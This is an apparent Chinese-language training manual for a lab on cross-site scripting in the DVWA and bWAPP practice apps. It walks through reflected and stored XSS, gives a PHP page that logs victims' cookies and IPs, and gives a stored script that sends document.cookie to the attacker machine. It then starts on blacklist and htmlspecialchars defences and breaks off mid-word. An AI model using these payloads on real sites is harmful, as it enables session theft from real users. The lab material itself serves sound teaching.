尋真求是格物致知信息安全發(fā)展態(tài)勢與知識拓展實訓(xùn)項目指導(dǎo)手冊V1.0目錄TOC\o"1-2"\h\u30212XSS跨站腳本點擊劫持分析及防護 220884概述 232577實驗環(huán)境 28207前提條件 216212實驗流程 27914實驗?zāi)繕?216549任務(wù)1反射型XSS漏洞利用 328655任務(wù)2存儲型XSS漏洞利用 625298任務(wù)3XSS漏洞防護 13

XSS跨站腳本點擊劫持分析及防護概述跨站腳本攻擊XSS(CrossSiteScripting)是惡意攻擊者往Web頁面里插入惡意Script代碼，當用戶瀏覽該頁之時，嵌入其中Web里面的Script代碼會被執(zhí)行，從而達到惡意攻擊用戶的目的。XSS攻擊針對的是用戶層面的攻擊，可以用來進行釣魚攻擊、前端js挖礦、用戶cookie獲取，甚至可以結(jié)合瀏覽器自身的漏洞對用戶主機進行遠程控制等。XSS跨站腳本攻擊分為三類：反射型XSS(reflected)、存儲型XSS(stored)、DOMBasedXSS。本實驗使用的靶場環(huán)境為：DVWA、bWAPP。實驗環(huán)境攻擊機：WindowsServer2016（01-Windows攻擊機），IP：30靶機：WindowsServer2016（03-Windows靶機），IP：56前提條件本實驗要求：熟悉Windows基本操作熟悉基本的PHP函數(shù)和HTML標簽實驗流程實驗?zāi)繕送瓿杀緦嶒灪?，您將能夠：掌握XSS漏洞基本利用方法掌握利用XSS獲取用戶cookie的方法掌握XSS漏洞的代碼級防護方法任務(wù)1反射型XSS漏洞利用【任務(wù)目標】構(gòu)造XSS代碼，觸發(fā)反射型XSS攻擊，并通過反射型XSS漏洞，獲取用戶cookie信息。注：本實驗靶場為：DVWA?！救蝿?wù)步驟】靶機開啟網(wǎng)站環(huán)境在靶機上，運行PhpStudy網(wǎng)站環(huán)境。攻擊機訪問靶機DVWA站點在攻擊機打開瀏覽器訪問http://<靶機IP>/dvwa/login.php，賬號：admin，密碼：password設(shè)置安全等級在DVWA首頁，單擊左側(cè)菜單欄“DVWASecurity”，將安全等級設(shè)置為：low。訪問反射型XSS漏洞頁面在DVWA首頁，單擊左側(cè)菜單欄“XSS(Reflected)”，進入反射型XSS漏洞頁面。執(zhí)行攻擊測試構(gòu)造XSS代碼：<script>alert(/xss/);</script>//該代碼含義為：執(zhí)行彈窗將代碼填寫到input輸入框中，并點擊“Submit”提交。頁面成功彈窗，說明攻擊代碼已被執(zhí)行。獲取用戶cookie 構(gòu)造XSS代碼語句：<script>alert(document.cookie);</script>將代碼填寫到input輸入框中，并點擊“Submit”提交。頁面成功彈窗，并將當前用戶cookie信息顯示在彈窗中，說明成功獲取到用戶cookie信息。任務(wù)2存儲型XSS漏洞利用【任務(wù)目標】構(gòu)造XSS代碼，觸發(fā)存儲型XSS攻擊，并通過存儲型XSS漏洞，獲取用戶cookie信息。注：本實驗靶場為：bWAPP。【任務(wù)步驟】訪問bWAPP頁面在攻擊機打開瀏覽器訪問http://<靶機IP>/bwapp/login.php，賬號：bee，密碼：bug，安全等級設(shè)置為：low。訪問存儲型XSS漏洞頁面在bWAPP首頁，單擊右側(cè)下拉框，選擇“Cross-SiteScripting-Stored(Blog)”并單擊“Hack”按鈕，進入存儲型XSS漏洞頁面。執(zhí)行攻擊測試構(gòu)造XSS代碼：<script>alert(/xss/);</script>將代碼填寫到輸入框中并點擊“Submit”進行提交。提交成功，并且嵌入的代碼被執(zhí)行。此時，代碼已經(jīng)成功被寫入到服務(wù)器中。因為代碼在服務(wù)器中永久保存，所以重新訪問該漏洞頁面，仍然會觸發(fā)XSS代碼。獲取其他用戶cookie(1)編寫獲取cookie值的頁面編寫一個可以獲取用戶cookie數(shù)值的頁面，并存放到服務(wù)器中，具體代碼如下：<?php$cook=$_GET['cookie']; //以GET方式獲取cookie$ip=$_SERVER['REMOTE_ADDR'];$time=$_SERVER['REQUEST_TIME'];$cookie=strchr($cook,'P'); //截取字符串$fp=fopen('cookie.txt','a'); //將數(shù)據(jù)寫入txt文本fwrite($fp,"IP:".$ip."\r\ncookie:".$cookie."\r\n");fclose($fp);?>將寫好的代碼文件存放到攻擊機的網(wǎng)站路徑中，并創(chuàng)建一個對應(yīng)名稱的txt文檔，用來存放其他用戶的cookie信息。在攻擊機中，運行網(wǎng)站環(huán)境。打開瀏覽器，本地訪問獲取cookie的頁面。(2)構(gòu)造XSS語句構(gòu)造如下XSS語句，當用戶訪問存在此代碼的存儲頁面，即可獲取該用戶cookie信息：<script>document.write('<imgsrc="30/xss/cookie.php?cookie='+document.cookie+'">')</script>在XSS漏洞頁面填寫該代碼，并提交。代碼提交成功，接下來查看cookie.txt文件。可以看到，當前用戶cookie信息已經(jīng)被寫入到txt文件中。因為代碼在服務(wù)器中永久保存，所以其他用戶訪問該頁面，同樣會獲取到對應(yīng)用戶的cookie信息。任務(wù)3XSS漏洞防護【任務(wù)目標】通過在頁面中加入防護代碼，實現(xiàn)XSS漏洞的代碼級防護效果。本節(jié)實驗環(huán)境為：DVWA，安全等級low，防護頁面為：XSS(Reflected)?！救蝿?wù)步驟】黑名單過濾在C:\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\xss_r\source下編輯low.php漏洞頁面，將<script>等關(guān)鍵詞添加到黑名單，代碼修改成如下圖所示：測試黑名單效果?？梢钥吹?，包含有<script>的部分被替換為空，導(dǎo)致無法觸發(fā)攻擊彈窗效果。函數(shù)過濾編輯XSS漏洞頁面，在用戶提交的內(nèi)容處，添加htmlspaci